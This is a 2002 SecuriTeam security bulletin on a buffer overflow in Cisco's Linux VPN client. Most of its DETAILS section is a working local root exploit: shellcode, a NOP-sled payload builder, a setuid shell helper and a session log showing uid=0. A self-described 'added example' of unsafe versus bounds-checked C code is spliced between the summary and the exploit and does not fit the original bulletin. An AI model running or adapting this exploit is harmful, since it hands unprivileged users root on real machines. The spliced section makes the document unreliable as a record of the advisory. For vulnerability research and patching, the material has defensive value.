[EXPL] Cisco VPNclient Buffer Overflow

From: support@securiteam.com
To: list@securiteam.com
Date: Fri, 21 Jun 2002 21:32:40 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Cisco VPNclient Buffer Overflow
------------------------------------------------------------------------

SUMMARY

The Cisco VPN Client for Linux lets a workstation connect to a Cisco VPN
concentrator. The client binary, vpnclient, is installed setuid root (see
the directory listing below). The profile name given as the argument to
'connect' is copied into a fixed-size stack buffer with no length check, so
any local user can overflow it and run code as root; a profile name of 520
bytes is enough to overwrite the saved return address. The exploit below was
tested against vpnclient-linux-3.5.1.Rel-k9. Until a fixed release is
installed, clearing the setuid bit on vpnclient removes the root path for
unprivileged users; the client then has to be started by root.
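The pattern the summary describes, as an added example that is not code from the advisory, from Cisco or from the exploit author: a connect handler that copies the profile argument into a fixed stack buffer with no bound, beside a bounded version that refuses over-long names instead of truncating them. The buffer size (512), the function names and the 512 + 4 + 4 = 520 derivation are assumptions for illustration; the real field width is not on this page.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed size of the on-stack profile buffer. 512 bytes plus a 4-byte saved
 * frame pointer plus a 4-byte return address is one i386 layout consistent
 * with the advisory's "520 to own eip"; the real width is not on the page. */
#define PROFILE_MAX 512

/* Vulnerable shape: unbounded copy of an attacker-chosen argument into a
 * fixed stack buffer. Any name longer than PROFILE_MAX bytes writes past the
 * buffer into the saved frame pointer and return address. This example only
 * ever calls it with short input. */
int connect_profile_unsafe(const char *arg)
{
    char profile[PROFILE_MAX];
    strcpy(profile, arg);               /* no length check: the bug */
    return (int)strlen(profile);
}

/* Hardened shape: check the length before copying, copy with an explicit
 * bound, always leave room for the terminator, and refuse rather than
 * silently truncate (a truncated name could still select the wrong profile).
 * Returns the name length, or -1 if the argument is rejected. */
int connect_profile_safe(const char *arg, char *out, size_t outlen)
{
    size_t n;

    if (arg == NULL || out == NULL || outlen == 0)
        return -1;
    n = strlen(arg);
    if (n == 0 || n >= outlen)          /* empty, or no room for the NUL */
        return -1;
    memcpy(out, arg, n + 1);            /* bounded: n < outlen was checked */
    return (int)n;
}

/* Builds a profile name of exactly 'len' bytes (the advisory's trigger
 * shape, constructed here), feeds it to the hardened handler and returns
 * its verdict. */
int long_name_result(size_t len)
{
    char out[PROFILE_MAX];
    char *name = malloc(len + 1);
    int rc;

    if (name == NULL)
        return -2;
    memset(name, 'A', len);
    name[len] = '\0';
    rc = connect_profile_safe(name, out, sizeof out);
    free(name);
    return rc;
}

int main(void)
{
    char out[PROFILE_MAX];

    printf("\"office\"      -> %d\n", connect_profile_safe("office", out, sizeof out));
    printf("511-byte name -> %d\n", long_name_result(511));
    printf("512-byte name -> %d\n", long_name_result(512));
    printf("520-byte name -> %d\n", long_name_result(520));
    return 0;
}
```

The hardened handler rejects anything that does not fit with its terminator, so the 520-byte name that owns EIP in the unsafe version never reaches a copy; the boundary case (511 accepted, 512 refused) is the one worth checking when reviewing a fix of this kind.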

DETAILS

Exploit:
/* buffer overflow for cisco's vpnclient for Linux
   tested against the latest release: vpnclient-linux-3.5.1.Rel-k9.tar.gz

   to get this to properly work, put the following code into xx.c, compile
   it (as xx), and place the executable into /tmp (to bypass tight PAM
   restrictions; /tmp must not be mounted noexec or nosuid):

   #include <unistd.h>
   int main(void) {
     setuid(0);
     execl("/bin/sh", "sh", (char *)NULL);
     return 1;
   }

   then compile this file (the session below was produced with the binary
   named vpnKILLient) and run it. syntax is ./vpnKILLient <offset>
   tested under gentoo linux and debian:
   $ ls -la `which vpnclient`
   -rws--x--x 1 root root 160900 Apr 13 22:34 /usr/local/bin/vpnclient
   $ ./vpnKILLient
   addr: 0xbffffbac, offset: 0
   Cisco Systems VPN Client Version 3.5.1 (Rel)
   Copyright (C) 1998-2002 Cisco Systems, Inc. All Rights Reserved.
   Client Type(s): Linux
   Running on: Linux 2.4.17 #1 Sat Apr 13 21:53:52 EDT 2002 i686

   sh-2.05a# id
   uid=0(root) gid=100(users) groups=100(users),10(wheel)

   greetz: all of the angrypacket crew (of course)
           shok -> pheerable^2;
           vegac -> 31336++;

   when you get a chance, check out http://sec.angrypacket.com
*/

#include <stdio.h>
#include <stdlib.h>     /* malloc, atoi */
#include <string.h>
#include <strings.h>    /* bzero */
#include <unistd.h>

#define NOP 0x90
#define LEN 620 /* 520 to own eip */

/* shellcode by vegac: setuid(0), then execve("/tmp//xx", {"", NULL}, {NULL}) */
/* wont work if your /tmp partition is mounted noexec or nosuid */
char shell[]=
        "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
        "\x31\xc0\x50\x68\x2f\x2f\x78\x78"
        "\x68\x2f\x74\x6d\x70\x89\xe3\x31"
        "\xc0\x50\x89\xe2\x54\x89\xe1\xb0"
        "\x0b\xcd\x80\x00";

/* current stack pointer; relies on gcc on 32-bit x86 returning whatever
   is left in %eax, the integer return register */
unsigned long get_sp (void) {
  __asm__("mov %esp,%eax");
}
int main(int argc, char *argv[]) {

  int i, offset=0;
  unsigned long addr;
  char *buf, *ptr;

  if(argc > 1) offset = atoi(argv[1]);

  buf = (char *)malloc(sizeof(char) * LEN);
  if(buf == NULL) {
    perror("malloc");
    return(1);
  }
  bzero(buf, LEN);

  /* guess where the sled lands in the target: our stack pointer minus
     the user-supplied offset */
  addr = get_sp() - offset;
  printf("addr: 0x%lx, offset: %d\n", addr, offset);

  /* fill the whole buffer with the guessed address so the saved return
     address (reached after 520 bytes) holds it whatever the alignment */
  for(i = 0; i < LEN; i += 4) {
    *(long *)&buf[i] = addr;
  }

  /* first half: NOP sled */
  for(i = 0; i < (LEN / 2); i++) {
    *(buf + i) = NOP;
  }

  /* shellcode straddles the middle of the sled */
  ptr = buf + ((LEN / 2) - (strlen(shell) / 2));
  for(i = 0; i < strlen(shell); i++) {
    *(ptr++) = shell[i];
  }
  buf[LEN - 1] = '\0';

  /* hand the overlong profile name to the setuid binary as the
     'connect' argument */
  execl("/usr/local/bin/vpnclient", "vpnclient", "connect", buf, (char *)NULL);
  perror("execl");
  return(1);

}

ADDITIONAL INFORMATION

The information has been provided by
<mailto:methodic@bigunz.angrypacket.com> methodic.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
